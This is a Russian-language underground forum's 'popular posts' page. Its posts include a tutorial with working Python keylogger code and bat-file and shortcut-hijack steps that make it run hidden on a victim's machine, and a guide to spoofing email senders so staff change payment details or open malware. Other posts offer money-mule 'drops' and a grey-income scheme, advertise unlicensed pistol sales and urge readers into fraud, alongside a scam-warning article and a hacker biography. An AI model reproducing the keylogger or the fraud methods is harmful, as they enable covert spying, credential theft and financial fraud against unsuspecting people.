Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 18.11.2021 в Сообщения

  1. 1 балл
    Питон слишком сложный , его не потянет 90% массы )
  2. 1 балл
    дмт в виде растения
  3. 1 балл
    Хорошая статья !)
  4. 1 балл
    я думал это называется динамичный айпи
  5. 1 балл
  6. 1 балл
    Приму залив на личную карту, Писать на почту gogladigon@gmail.com. БЕЗ ПРЕДОПЛАТ!!!!! РАЗВОДИЛИ МИМО!!!
  7. 1 балл
    Давай поработаем , гаранту залил депозит
  8. 1 балл
    Новости про «запрет подпольного интернета» только подогревают интерес к нему у населения. Все больше русских приобщаются к даркнету, который таит в себе много опасностей и соблазнов
  9. 1 балл
    Сегодня я покажу как создать простой кейлоггер на Python. Что такое кейлоггер? Кейлоггер (клавиатурный шпион) — небольшая программа, главным назначением которой является скрытый мониторинг нажатий клавиш на клавиатуре и ведение журнала этих нажатий. Данное определение на самом деле не совсем правильно, так как в качестве кейлоггеров, клавиатурного шпиона может использоваться как программные, аппаратные так и акустические кейлоггеры. Простой кейлоггер на Python. Для создания кейлоггера нам потребуется: Операционная система: Windows или MacOs. Установленный на целевой машине Python, а также специальные библиотеки. Данный материал носит информационный характер. Изложенная в статье информация предоставлена исключительно в ознакомительных целях. Создание простого кейлоггера на Python. 1)Для начала необходимо скачать и установить Python. официальный сайт Python. 2)После установки Python вам необходимо установить модули «pyHook» и «pywin32». На этом сайте вы найдете 32- и 64-битные версии для Windows и других ОС. Скачайте «PYhook» и «pyWin32» в соответствии с установленной вами версией Python. Кейлоггер на Python. Модуль PYhook Кейлоггер на Python. Модуль pyWin32 3)После загрузки установите и откройте меню IDLE (Python GUI) из меню «Пуск». 4)Зайдите в меню «Файл» и нажмите на пункте «Новый Файл». После чего вставьте код кейлоггера: import pyHook, pythoncom, sys, logging file_log = 'C:\\keyloggerlog.txt' def OnKeyboardEvent(event): logging.basicConfig(filename=file_log, level=logging.DEBUG, format='% (message)s') chr(event.Ascii) logging.log(10,chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = OnKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages() 5)Сохраните его назвав файл Keylogger.pyw. Только не сохраняйте файл в корневом каталоге C: где для копирования и удаления файлов нужны права администратора. Создайте новую папку на диске C: или в другом месте, где вам не нужны права администратора для копирования файлов и сохраните Keylogger.pyw там. В качестве выходного файла отчета «file_log =« C:keyloggerlog.txt » вы можете выбрать любое место, но лучше конечно, какое-то скрытое место на жестком диске. В этом примере я буду сохранять файл отчета на диск в корневой каталог C:. Ведь мне нечего скрывать. Автоматический запуск кейлоггера на Python. Кейлоггер готов. Теперь надо сделать так чтобы кейлоггер запускался скрыто от пользователя и автоматически с загрузкой Windows. Реализовать это можно по разному. Попробуем сделать с помощью bat-файла привязав запуск кейлоггера к какой-нибудь программе или прописав в автозагрузку. 1)Для начала создайте bat-файл. Скопируйте и вставьте в блокнот следующий код: @echo off start "" "C:\keyloggerkeylogger.pyw" start "" "C:\Program Files\Operalauncher.exe" В первой строке необходимо вписать путь к файлу keylogger.pyw (в моем случае «C:keylogger.pyw»). Во второй строке вы должны ввести путь к программе, который обычно использует пользователь (в моем случае — браузер Opera). 2)После редактирования сохраните файл в расширении .bat (в моем случае logger.bat) в каком-нибудь скрытом месте на компьютере (в моем случае в «C:keylogger.bat»). 3)Теперь идем на рабочий стол и выбираем ярлык часто используемой программы (в моем случае — это браузер Opera). Правым кликом мышки вызываем контекстное меню и заходим в свойства ярлыка. В поле «Объект» вводим путь к бат-файлу кейлоггера «C:keyloggerlogger.bat». После внесения изменений изменится и иконка ярлыка. Но это легко решается на вкладке свойстве (смотрите скрин выше). Теперь, когда жертва откроет браузер Opera, автоматически запустится бат-файл, т.е. наш кейлоггер. С этого момента все нажатия на клавиатуре будут сохраняться в файл keyloggerlog.txt. Для остановки работы кейлоггера зайдите в диспетчер задач и закройте процесс. Данный метод имеет одно «но». Каждый раз при запуске кейлоггера будет появляться окно командной строки. У людей далеких от компьютера это не вызовет подозрений, а вот продвинутый пользователь может понять в чем здесь дело. Скрыть окно командной строки можно с помощью конвертера bat в exe. На этом все. Теперь вы знаете, как создать простейший кейлоггер на Python, который при желании можно доработать еще лучше.
  10. 1 балл
    Карту затестил, отлично работает , спасибо кореш )
  11. 1 балл
    Продаю личную схему серого заработка на услуге. (о том что именно за услуга сказать не могу, в этом её фишка, самому до такого додуматься сложно) Гео значения не имеет, работать можно из любой страны, в том числе и англо-язычной. (я уверен что доход там будет высше чем в странах СНГ, так как люди там в целом более прогрессивные) Опыт заработка в интернете не важен. (Сложного в техническом плане ничего нет, новичек легко справится потратив немного времени на разбор полётов) Доход 70000-90000р. в месяц. (средний чек с одного человека 2000-5000р.) Рабочий день строго не регламентирован. (можно самому установить себе график, выйдя на оптимальный для себя заработок) В мануале подробно описаны: - Суть самой услуги (от А до Я) - Площадки и способы получения трафика (по статистике 1 из 3 написавших, становится нашим клиентом) - Шаблоны общения с клиентами (вопросы у людей идентичны, отвечать нужно по заготовленному шаблону) - Способ автоматизации получения трафика (можно будет работать в паре, или нанять человека который будет выполнять основную работу) Конкуренции можно не боятся, раздолье в виде широкой и при этом постоянно меняющейся целевой аудитории это позволяет. Некоторые, к тому же, будут пользоваться услугой повторно. Тема хорошо зарекомендует себя, как источник постоянно дохода. Работа чисто online. Цена: 40000р. Работа через гарант приветствуется. Тему отправил на проверку администрации форума.
  12. 1 балл
    Курить спайс плохо - спайс наркотик для лоха
  13. 1 балл
    Привет, бандиты.Сегодня рассмотрим трендовую тему, подмена имени отправителя емейла. Есть такая тема, когда отправляете письмо, у вас в отправителе вместо оригинала - фэйк адрес. К примеру: Реальный адрес - vasya@mail.ru Фэйк - billgates@microsoft.com Рассмотрим как делается подмена, как от этого защитится и вообще опасность данной схемы. Представим что злоумышленник обладает инсайдерской информацией. Он с легкостью может заслать секретарше письмо, а в наше время секретарши в основном обладают отсуствием гипофиза и чаще не просматривают внимательно. А если применить методы Социальной инжерении и предварительно заебать секретутку, она потеряет бдительность и тогда будет все выполнено наверняка. И так, мошенник обладает инсайдерской информацией, что компания "OOO Василий и партнеры" планируют закупку какого либо оборудования, у компании "ООО Билл Гейтс" Может прислать компании письмо от имени "ООО Билл Гейтс" Письмо можно отправить с любого адреса, все что вы напишите в поле "From" там оно и останется. Указываете From: billgates@microsoft.com В поле Reply-to: vasya@mail.ru Конечно можно в Thunderbird'е прописать поле "Reply to:vasya@mail.ru", Вот таким образом. В итоге получаем письмо от Билла Гейтса. Но если откроем письмо, мы увидим что письмо на самом деле не от Гейтса а от васи пупкина. Да можно конечно воспользоваться сервисами и smtp аккаунтами. Так же максимально подделав на похожий домен отправителя, чтоб не вызывать подозрений. Но суть в том, что при должном подходе, люди открывают файлы, скачивают, меняют реквизиты для оплаты, да много чего, люди чаще всего привыкли не замечать мелочей. А в нашем деле, мелочи - это большое значение. Опять же этот способ применяется как для распространения вредоносных программ, так и для получения какой либо информации, подмена платежных поручений. Знаю случаи когда секретутки не долго вглядываясь в структуру, печатают платежные получения и несут в руки бухгалтеру, а что, как, хрен знает. Обычный обыватель ПК, не заметит подмены, если должным образом максимально подобрать доменный адрес. Если реальный получатель: bill@vasiliipartnery.com - допустим корп мыло. Можно фэйковый сделать : bill@vasilipartenry.com - врятли кто-то заметит подмену, и еще имя отправителя подменить на настоящий. Тогда успех 99% Относитесь внимательно к письмам. Проверяйте имя отправителя и всегда потдверждайте по телефону намерения если есть такая возможность
  14. 1 балл
    продам без походов в ОЛРР, два травматических пистолета 1. steyr m-a1, Австрийского производства, калибр 10Х28, серия BWW, 2011 г.в, настрел 200 патронов, состояние нового пистолета. Цена 30 000 2. ТТ-Т , донор 1945 года, переделка завода ЗиД, калибр 10Х28, гастрел 150 патронов, состояние идеальное. Цена 25 000 Более подробную информацию по телефону или в ЛС форума.
  15. 1 балл
    Ваша реакция первое время приблизительно такая - ЕБАТЬ СКОЛЬКО ТУТ СХЕМ, ДА Я ЖЕ БУДУ ХУЕВЫМ МИЛЛИОНЕРОМ... Возможно вы даже довольно быстро научитесь генерировать что нибудь своё... НО! Вы начинаете себя накручивать. Знаете почему это происходит? Потому что все твердят про магическую анонимность. По хорошему то счёту, вы не действуете из-за той причины, что боитесь что вас будут ебать в жопу на зоне и посадят в уголок петуха, так вот что скажу: Вы работаете в коллективе? Учились в Универе\Школе\Детском Саду? Вас гнобили? - в таком случае вам прямой путь в уголок петуха, если у вас нет бабла на воли(same связям) и мозгов. Если же нет - вы будете обычным мужиком, а может быть и блатным, ну и в конце концов вас коронуют до Вора в Законе. Да и тем более, хотите злую шутку? За ту херотню которую вы сможете провернуть на первых порах в интернете, не имея не опыта, ни знаний, используя банальную анонимность - вы нахуй никому не сдались... Знаете почему "Неуловимы Джо" был неуловимым? -Да потому что на него всем было похуй, и на вас так же всем похуй А СЕЙЧАС РАССКАЖУ ВАМ СИТУАЦИЮ КОТОРАЯ КРУТИТСЯ У ВАС В ГОЛОВЕ ЧАСАМИ: Вот вы такой невъебаться Хацкер, кинули лоха на предоплату, даже предварительно убедились по аватаркам, тексту сообщений, что он откровенное "НИКТО" и тут вы думаете, а вдруг у него кто то из знакомых МЕНТ\ВЛИЯТЕЛЬНЫЙ ЧЕЛОВЕК и вас будет искать за 500-10000р, ну ладно за 10к с одного рыла может и подсуетятся(не факт) но блять за такие мелкие суммы как 500р - 1000р НА ВАС ВСЕМ ПОЕБАТЬ! Если вы использовали хотя бы какую то анонимность, ради вас уже нужно тратить время, ВЫ НАХУЙ НИКОМУ НЕ СДАЛИСЬ, ПОЙМИТЕ ЭТО УЖЕ . Вы живёте в России, более вероятно что вас посадят за то что вы просто скажите что то про руководство страны или про церковь, чем то что вас засадят из-за лоха разведенного на несколько косых, ой засадят? О чём это я? Да максимум условка, если вы настолько криворукий уебан, что не смогли настроить ДАБЛ-ВПН+ДЕДИК+ВПН+ТОР, то мне вас просто жаль, и тут вам не место, вернитесь на завод и делайте что то полезное руками, толку будет больше. Ну как знакомая ситуация? А ВОТ ЕЩЁ ОДНА СИТУАЦИЯ: У вас есть схема по которой вы работаете, она приносит ПАРАШНЫЙ довольно доход, ОТНИМАЕТ ХУЕВУ ТУЧУ ВРЕМЕНИ, ЗАБИРАЕТ ВСЕ НЕРВЫ, Но вы работаете по ней, и у вас есть куча ахуенных идей, но вы боитесь что они не стрелнут и вы лишитесь всего, и поэтому продолжаете заниматься парашей которая вас уже конкретно напрягает, а знаете почему? ПОТОМУ ЧТО ВЫ БОИТЕСЬ ПОКИНУТЬ ЗОНУ СВОЕГО КОМФОРТА! ВЫ СУКА ТАК БОИТЕСЬ ЕЁ ПОКИНУТЬ, ЧТО ДАЖЕ НЕ МОЖЕТЕ УЛУЧШИТЬ СВОЮ ЖИЗНЬ! И всему этому виной является что?? СТРАХ! Ну как? Пойдём дальше... Я довольно часто наблюдай людей, у которых реально много идей и они боятся РИСКОВАТЬ дабы достать "СТАРТОВЫЙ КАПИТАЛ" Вот у вас есть какая то идея и вы её просто перемусоливаете у себя в голове, день\два\месяц\год, возможно даже записали где то(что советую делать) Но вы всё никак не можете выделить на это деньги! Вы отмазываетесь сами от себя, почему? Да потому что боитесь, боитесь того что опять же не выгорит... ВЫГОРИТ СУКА, ВЫГОРИТ, И ЕЩЁ РАЗ ВЫГОРИТ! Гарантии? У меня куча таких знакомых (не друзей) и все они мне стабильно рассказывают эти идеи, а я в тихую их реализую, мне тупо дают идеальный план работы, а я их исполняю, то есть, понимаете ли в чём дело? Их Держит на Месте исключительно их СТРАХ! А я наживаюсь Весело потом смотреть на их ёбла, и знать о том что у тебя за спиной шепчутся что ты был такиииим глупым в универе и тд, а сейчас так хорошо поднялся... Ну да, странно, чего же это? Вы же ведь великие , умные пацаны, ссытесь даже от слова КРИМИНАЛ Могу продолжать до бесконечности, но скажу одно, СТРАХ, это не только хуёвая вещь, а ещё и Ахуенная, ну во первых он реален как ничто другое, ты его чувствуешь, и он есть у всех, за счёт этого можно давить на любого человека. Но сейчас об этом не буду расписывать. Хочу лучше рассказать вам дорогие товарищи, как же можно использовать тот самый СТРАХ, в своих целях. ИТАК, ПРЕДСТАВЬТЕ ЧТО У ВАС РАК и жить вам осталось ровным счётом нихуя, ну там месяца два, три... Что вы будете делать? Очковать дальше? О нет. Вы будете творить всё что угодно, любую хуйню, может оттрахаете кого посреди улицы, нанюхаетесь, накуритесь, в конце концов ПОССЫТЕ С БАЛКОНА НА МАШИНУ СИНИХ, а всё почему? Терять то уже нечего... Вернёмся в ваше положение дел, вы живы,здоровы и тут внезапно, через три месяца вас допустим собьёт на смерть сын мажора, чего вы добились? Нихуя и померли? Круто вы прожили жизнь... Оторвались бля... ОГОНЬ. А как теперь думаете, стоит боятся? Неа. Лучше бойтесь того что вы проживете никчемную жизнь, так и не попробовав всех её прелестей (которые можете получить за деньги), и умереть в дерьмовых китайских шмотках, оставив итак несчастную свою семью мало того что нищей, так и без единственного кормильца который каждый день домой притаскивыл 5 бичпакетов и дерьмовый Соевый фарш (закос под мясо) В ахуенную однушку на отшибе "Залупарево". А в прочем, это ваша жизнь, вам решать...
  16. 1 балл
  17. 1 балл
    Спасибо,за сохраненные нервы ))
  18. 1 балл
    Самые выгодные предложения товаров и услуг в Сети могут оказаться мошенничеством. О распространённых схемах обмана рассказывает наш читатель, который предпочёл не называть своего имени. Некоторые продвинутые пользователи знают, что существует другой интернет, его тёмная сторона. Я не имею в виду Tor. На просторах обычного интернета есть доски, форумы, где тусуются люди, которые оказывают не совсем законные услуги. Самый простой пример — это дешёвое такси. За 300–700 рублей вас будут катать по городу от 1 до 2 часов в машине комфорт- или бизнес-класса. На этих форумах также есть и другие услуги: заказ отелей со скидкой 50–75% от официальной цены, авиаперелёты со скидкой 40–50% и многое другое. Плюс в Telegram есть куча различных каналов, где полно мануалов о том, как заработать очень приличные деньги законными и не очень законными способами. У человека, который впервые с этим сталкивается, просто взрывается мозг. Он понимает, что вот оно — счастье, вот кладезь халявы! И мозг рисует такие суммы, от которых кружится голова. Но у этого есть и обратная сторона. В этой среде я человек уже со стажем, но тоже попадался на удочку. Ниже я разберу три самые популярные схемы мошенничества. Схема 1. Двойник. На сайтах, которые предлагают с огромными скидками отели, перелёты, прокат, есть люди, которые занимаются организацией предоставления данных услуг. У каждого продавца (селлера) есть контакты, по которым можно связаться с ним. Обычно это Telegram, ICQ , в редких случаях Jabber. Мошенники активно следят за такими селлерами и делают дубликаты их Telegram-каналов. Например, селлер пишет на форуме свой контакт вида @travelvasya, мошенник регистрирует @travelvasja и @travelvasyabot. При этом фотографии профиля будут идентичными, плюс надпись в профиле «Заказы отправлять только сюда». Пользователь, который ищет контакты селлера в Telegram по нику, может не заметить подвоха. Селлеры тоже отслеживают своих двойников и сообщают в своих темах, что людям с этими никами не стоит писать, так как это кидалы. Мошенники тоже отслеживают, что пишут селлеры, и придумывают новые ники. Вот такой круговорот ников в Telegram. Аккаунты некоторых селлеров в ICQ и Jabber периодически взламывают, поэтому можно написать по тем контактам, что указаны, но попасть уже на взломанный канал. Вот типичный пример продавца, который описал, где он взломан и где от его имени работают мошенники. Дальше пользователь, который случайно написал не туда, начинает переписываться не с тем, с кем надо. Он спрашивает про то, что его интересует. Когда пользователь созрел, начинается самое главное. Небольшое отступление: на каждом форуме есть некий гарант, через которого желательно проводить все сделки. Смысл гаранта в следующем: пользователь договаривается на определённые услуги селлера, например аренду гостиницы на 50 000 рублей. Пользователь пишет гаранту о том, что он договорился с селлером на такие-то даты арендовать номер в такой-то гостинице и должен заплатить определённую сумму. Гарант прибавляет свои 10% и выставляет покупателю счёт на 55 000 рублей. Покупатель переводит деньги гаранту, тот пишет селлеру, что деньги получил и можно работать. Для покупателя такой посредник является гарантом безопасности. Если вдруг селлер не исполнит обязательств и сделка сорвётся, то покупатель получит обратно свои деньги за вычетом комиссии гаранта, так как селлер получит деньги от гаранта после того, как выполнит все свои обязательства. То есть покупатель отдыхает дёшево и после этого пишет гаранту, что всё прошло хорошо, и гарант пересылает 50 000 рублей селлеру. Теперь возвращаемся к схеме развода. Покупатель и псевдоселлер договорились, что стоимость услуг составит 50 000 рублей. Когда мошенник понимает, что сделка на 100% совершится, то его задача — отговорить покупателя от услуг гаранта. Он предлагает дать дополнительную скидку, например в 5 000 рублей, и объясняет покупателю, что ему это выгодно. Покупатель понимает, что он, во-первых, дёшево взял гостиницу, а во-вторых, ещё и получит скидку, поэтому переводит деньги напрямую мошеннику. Покупатель начинает писать личные сообщения на форуме реальному селлеру: «Где моя путёвка?» Селлер ему объясняет, что он с ним никаких переговоров не вёл. И тогда покупатель понимает, что жадность фраера сгубила. При этом в полицию не пойдёшь, так как покупатель тоже нарушил закон. Схема 2. Возьмите меня в ученики. Эта схема распространена в Telegram. Суть её проста. Создаётся канал, в котором якобы неизвесный хакер, удачливый кардер (тот, кто работает с платёжными картами) рассказывает о схемах заработка в интернете, делится лайфхаками, рассказывает о безопасности и так далее. Он через другие группы, которые занимаются распространением информации, рекламирует себя, тем самым привлекая новых подписчиков в свой канал. Всё то, что он рассказывает, можно найти в интернете, если хорошо поискать. Схемы действительно рабочие. Если почитать, то на их реализацию надо много времени. После нажатия пары кнопок на клавиатуре деньги с неба не посыпятся. Конечно же, этот человек пишет, что подобным образом он зарабатывал большие деньги — до 300 000 рублей в месяц, но теперь эти схемы ему неинтересны, поэтому он сливает их. Прокачав канал и накалив там обстановку, хакер вдруг устраивает аттракцион невиданной щедрости. Появляются сообщения следующего содержания: Вот группа, в которой 40 000 человек. Из них на это ведутся десять самых проворных. Может, и больше. Дальше каждый скидывается по 75 000 рублей. Я видел курсы и за 300 баксов, и за 100 000 рублей — всё зависит от жадности и размера группы. И дальше этим новичкам рассказывается якобы эксклюзивная информация, которая на самом деле таковой не является. Просто из различного рода материалов с просторов интернета можно составить свой авторский курс, иметь средние представления о безопасности в Сети, понимать схемы кардинга и продавать такую программу обучения направо и налево. По опыту, чтобы разобраться в безопасности, кардинге, методах пересылки посылок, биржах закупки материала, настройке компьютера, необходима неделя. Это 3 часа в день для человека, который ничего вообще не знал до этого. В итоге людям продают общедоступные вещи по цене якобы эксклюзива от раскрученного Telegram-канала. Опять же в конечном итоге потерянные деньги и скорее всего свобода, если все-таки решились применить информацию на практике. В полицию не обратитесь, а еще и сами нарушаете уголовный кодекс своей страны. Схема 3. И швец, и жнец, и на дуде игрец. Регистрируется якобы форум, посвящённый тёмной стороне интернета. Пользователь попадет на него и видит ветки, в которых делятся схемами заработка, продают какие-либо услуги. На вид крутой форум с кучей тем, отзывами, своим гарантом. Но на самом деле его наполнением занимается один или несколько человек. Все отзывы посторонних пользователей жёстко модерируются. Главная задача этого форума — это раскрутка нескольких тем, по которым происходит обман. Вот пример такого форума: А вот то, ради чего он создавался: Замысел такой: есть теневой форум, где много полезной информации и есть возможность купить, например, технику Apple со скидкой 60%. Это же мечта любого! Или пополнить свою карту чужими деньгами с выгодой до 60%. И дальше начинается игра одного актёра. С одним вы договариваетесь о покупке техники или о начислении денег на вашу карту. Гаранту, который является и продавцом, вы отписываетесь о сделке и отправляете деньги, а дальше ни денег, ни техники. При этом после перевода средств либо все ваши сообщения ставят на премодерацию, либо блокируют ваш аккаунт.
  19. 1 балл
    Человека, о котором я хочу рассказать сегодня, в Америке знают многие: за ним гонялись федеральные маршалы, ФБР и полиция, и при этом он умудрялся участвовать в прямых эфирах NBC, CNN, и, несмотря на свою молодость (в 2010 году ему было ему было 27 лет) — успел осуществить взломы сетей таких монстров, как AOL, Yahoo, Microsoft, Excite@Home, AT&T Telecom, MCI WorldCom, Intel, Bank of America, CityBank, Cisco, Google и многих-многих других известнейших компаний, перечислить одни названия которых здесь не представляется возможным. Когда у него спросили, как он выбирал свою жертву для очередного взлома — он отвечал незамысловато: «я просто шел по списку Fortune 500 сверху вниз». В его 23 года про него уже сняли документальный фильм Hackers Wanted, где в качестве очевидцев про его похождения рассказывает Стив Возняк, cо-основатель Apple (в сети которой он побывал в 2001), Лео Лапорте, основатель крупнейшего коллективного блога Digg (на серверах которого он отметился в 2000), и другие ветераны IT-индустрии. Фишка #1 Но давайте обо всем по-порядку. Первая интересная особенность Эдриана Ламо (Adrian Lamo), а нашего героя зовут именно так, в том, что он, возможно, единственный в мире бездомный хакер. Если повезет, он ночует в заброшенных зданиях, в теплую погоду — на скамейках в парках, в холодное время — в молодёжных сквотах. Интернетом он пользуется только через публичные хот-споты, в интернет-кафе, барах и других бесплатных местах пользования беспроводным интернетом, коих в Америке навалом. «За свою жизнь я не заплатил и доллара за интернет» — шутит он. Учебу он бросил уже давно за ненадобностью, с тех пор колесит по Америке, подолгу нигде не задерживаясь. Вместе с тем, несмотря на такой немного легкомысленный образ жизни, за плечами у Эдриана успешные проникновения в самые защищенные сети мира. Фишка #2 Вторая особенность Ламо — для проникновения в закрытые интранет-сети компаний он не пользуется ничем, кроме браузера. Это его основной принцип — никаких дополнительных или специализированных хакерских средств: скриптов, эксплоитов, троянов и снифферов, средств автоматизации и автоматического анализа — всё это, как выражается сам Эдриан — «лишнее для него». Как правило, для проникновения в интранет организаций Ламо использует некорректные настройки корпоративных прокси-серверов, а для взлома баз данных в этих закрытых сетях — различные типы SQL-инъекций. Конфуз NBC Например, когда Эдриана Ламо пригласили в 2002 году на вечернее шоу NBC Nightly News, чтобы он в прайм-тайм как приглашенный эксперт прокомментировал чужой взлом какого-то крупного сайта, никто не предполагал чем это закончится. Поскольку Ламо, несмотря на свой юный возраст — признанный специалист по безопасности, — интервьюер не преминул, между прочим, спросить его, сможет ли он, например, взломать сеть их телеканала — NBC. Нисколько не конфузясь такого неожиданного оборота, Ламо ответил «раз плюнуть» и, открыв свой ноутбук, вышел во внешний интернет. Ровно через 5 минут, и всё под объективом камеры, он смог попасть в интранет NBC, успешно миновав все страницы авторизации и получив полный доступ к базе данных канала с личными данными всех экспертов, гостей и сотрудников, на главной странице которой по злой иронии заглавными буквами было написано: «All information contained on this Web site is to be held in the strictest confidence». Эта передача так и не вышла в эфир в обозначенный срок — юридический отдел канала категорически запретил её выход, потому что в этом 15-минутном, по-сути обучающем ролике, хакер, на примере самого NBC, подробно показывал, как нужно искать лазейки, ошибки в настройках прокси-серверов, и как легко можно попасть почти в любую закрытую сеть извне, используя для этого лишь обычный браузер и совсем немного сообразительности. Тернистый путь к известности Наибольший пик «успехов» Эдриана Ламо по количеству взломов и именитости взламываемых компаний пришелся на его 22-летний возраст. Обычно, стратегия Эдриана была такова: он незаметно и максимально анонимно проникал в интранет сети компаний, взламывал их базы данных, при этом ничего не модифицируя и не нанося никакого урона, а потом сам списывался с их сетевыми администраторами и подробно излагал проблемы данной конкретной сети, демонстрируя и доказывая наглядно, её уязвимости. Таким образом, он пытался оставаться «Белой Шляпой» (хотя бы в своих глазах), применяя по-сути незаконные методы. Обычно это работало как надо, и компании не возбуждали против него судебного преследования. Многие даже были благодарны за бесплатное тестирование и укрепление их сетей, хотя, конечно, большинство компаний относились к этому с едва сдерживаемым раздражением. В большинстве случаев, тот же Citibank и прочие, просто не хотели широкой огласки того, что какой-то бездомный юнец, у которого даже не было денег на платное подключение к Интернету, из обычного МакДональдса через их бесплатный хот-спот, с помощью обычного Internet Explorer’a проникал в их сверхзащищённую сеть и хозяйничал там абсолютно безнаказанно. Что интересно, среди всех были такие прагматичные компании, которые даже пытались заплатить юному хакеру, за проделанное тестирование их сети и подробный отчет обо всех найденных уязвимостях — Эдриан всегда отказывался от таких предложений заработать. Не знаю, чем это было мотивировано в наш век денег и наживы, но Эдриан никогда не хотел брать деньги за хакинг, и не сделал в этом своем принципе ни одного исключения, даже для Cisco, которая хотела нанять его инженером по безопасности на полный рабочий день. Сам Эдриан считает, что каждый его взлом — это арт-перфоманс, попытка привнести в этот мир нечто, что было до него невозможным, — о чем он очень подробно рассуждает в интервью журналу Rolling Stones, где его представляют читателям, как «сетевого художника». Пик хакерской карьеры и публичности Каким бы искусством не казалось это 23-летнему парню тогда, но сейчас понятно, что такая «игра с огнем» с очень серьёзными компаниями была весьма опасна, и это не могло продолжаться вечно... И вот в конце 2002 года произошёл роковой, и оттого самый громкий взлом в карьере Эдриана — как обычно, он успешно проник в интранет-сеть газеты The New York Times Используя некорректную работу корпоративного прокси-сервера, он вошёл в неё за 5 минут, после чего ему понадобился ещё час, чтобы разделаться с внутренней базой данных газеты, которая хранила море конфедициальной информации. Когда он написал администраторам сети о наличии уязвимостей, они просто напросто не поверили ему в этом, написав ему в ответе: «Кто ты к черту такой и откуда вообще взялся?». Тогда он вернулся обратно, и добавил свои личные данные в базу данных газеты в список топ-экспертов по IT-безопасности, с которыми консультируется газета в ходе своей журналисткой работы. Он повторно отправил администраторам письмо, где уже ссылался на своё резюме в их же базе мировых IT-авторитетов, кроме того, он привел в письме личный номер мобильного телефона Джимми Картера, бывшего президента США, взятый из самой защищённой части базы (содержащей контакты с VIP-персонами Америки), чтобы показать местным админам, чего он на самом деле добился. На этот раз как-то все сразу во все поверили, но события приняли неблагоприятный для Эдриана оборот — газета подала официальный запрос в ФБР по факту взлома БД и незаконном проникновении в их корпоративную сеть. Его обвиняли в незаконном проникновении, взломе и модификации базы данных, а также хищении из базы более 3000 телефонных номеров мобильников звезд Голливуда, известных актеров и музыкантов, политических лидеров, спортсменов, бизнесменов, телеведущих, моделей, а также известных журналистов и писателей Америки. Расследование и поиск Эдриана продолжались 15 месяцев, после чего, Эдриан решил сам сдаться федеральным маршалам США в Сакраменто, признав свою вину и публично извинившись перед всеми компаниями, которым он неумышленно причинил ущерб. Суд назначил ему штрафную выплату в сумме $65000, 6 месяцев домашнего ареста в доме его родителей, а также ещё 2 года испытательного срока, в течение которых ему, в том числе запрещалось подходить к компьютерам на расстояние ближе, чем 100 метров. Интересно, что в процессе суда Ламо снова проявил свой хакерский характер, категорически отказавшись предоставлять ФБР образцы своей крови для добавления его ДНК в единую базу данных спецслужб США. Очень религиозный Ламо, прямо в суде цитировал стихи Библии, где Господь рекомендует очень осторожно обращаться с человеческой кровью, из-за её весьма специфических свойств (Бытие 9:6). Господь Элохим запрещает проливать не только чужую, но и собственную кровь, какой мотивацией бы мы при этом не руководствовались. В целом, комментируя все эти стихи, Эдриан строит довольно сложные и очень субъективные мистическо-религиозные конструкции (но мы опустим их здесь, чтобы не травмировать психику нашему редактора журнала, которому всё это придётся вычитывать и выверять). Но этот неожиданный оборот в деле молодого хакера снова привлек к нему широкое общественное внимание, и он снова попал на телевидение, теперь уже в новом амплуа — по вопросам религиозно-правового характера. Удивительно, но это длинное противостояние со спецслужбами закончилось победой Эдриана: благодаря именно данному инциденту прецедентное законодательство США было изменено — была законодательно добавлена поправка с возможностью взятия образца ДНК простым мазком со щеки, без обязательного взятия крови, как это было раньше Эдриан в одном из интервью спрашивают, как он в целом оценивает безопасность крупных современных корпоративных структур, на что Эдриан довольно браво заявляет: «Я могу проникнуть в любую корпоративную сеть, подключенную к интернету, меньше чем за 15 минут. Мой опыт показывает, что чаще всего, их высокооплачиваемые сетевые администраторы не знают самых банальных вещей, например, что web-сервер Apache также является и proxy-сервером, факт чего в подавляющем большинстве инсталляций которые я видел в реальной жизни, просто игнорируется и никак не учитывается: За свою молодую жизнь я видел очень много реализаций DMZ, подавляющее большинство из них мягко говоря некорректны... Большинство ошибок настройки сетевых инфраструктур — типичны, они повторяются от одной компании, к другой. Например, какой-то профессоришка когда-то написал в умной книге дорогого издательства, что нужно делать именно так — с тех пор всё новые и новые поколения леммингов-администраторов воспроизводят это в своей сетевой околорелигиозной практике. Я переписывался с администраторами многих взломанных мною сетей, объясняя им, что так делать не нужно — чаще всего они не верили мне, даже перед фактом того, что их сеть была успешно взломана. К счастью, я не читал таких умных книг как они, когда сам учился этому, поэтому у меня нет врожденного табу, чтобы в упор не видеть этих грубых ошибок.» Довольно забавно, что Эдриан сам не имеет даже законченного среднего образования, не то, что высшего — он не сдал выпускные тесты своего родного колледжа и был отчислен, о чем особенно и не сожалеет до сих пор. Когда его спрашивают об образовании, он отшучивается: «это пустая трата времени». Нужно признать, что Эдриан асоциален во всем, и, похоже, это действительно делает его свободным в выборе своей жизни Фишка #3 Интересно, что у Ламо есть и третья особенность. Его более традиционные коллеги-хакеры, очень часто нападают на него и публично называют его мошенником и проходимцем. Это отношение к нему даже уже стало своего рода клише в хакерской среде. Многие специалисты, видя его работу в браузере, говорят: «Это слишком просто — любой так может». Один из редакторов известнейшего портала по безопасности SecurityFocus.com ехидно замечает: «Вы очень впечатлены невероятными способностями Ламо? Но я вам говорю, что он не делает ничего необычного. Он не нашёл и не изобрел никаких новых концепций или методик в области компьютерной безопасности. Он просто использует супербанальные и простейшие уязвимости, а также элементарные ошибки в настройках прокси-серверов. Его секрет лишь в одном — этот молодой парень слишком много светится на телевидении. Он взломал не сети, он — взломал медиа». На все выпады в адрес Ламо, которого повторю, не очень-то любят его коллеги, удачно заочно отвечает его хороший знакомый — Оксблад Раффиан (Oxblood Ruffian), лидер знаменитой хакерской группы «Культ Мертвой Коровы»: «Это похоже на танец. Почти каждый умеет танцевать. Более того, все знают, как это делать. Но только единицы могут танцевать так, как это делает Майкл Джексон». Ещё у одного знакомого Ламо, Кевина Митника, однажды спросили, с чего начать изучать хакерство, его ответ был коротким: «Изучите отчет о взломе MCI WorldCom Эдрианом Ламо. Здесь в совершенстве используется весь спектр приемов: технические, социальные, креативные.» И уж если речь пошла о MCI WorldCom, то кстати сказать, взлом магистральных провайдеров Америки — одна из самых любимых специализаций Эдриана: «Когда я вижу сеть или организацию, в названии которой есть приставка Provider или ISP — я уже сразу знаю наверняка, что здесь я могу себя чувствовать как дома. Обычно здесь слишком много администраторов, слишком много серверов и слишком много самого разнородного траффика — т.е. 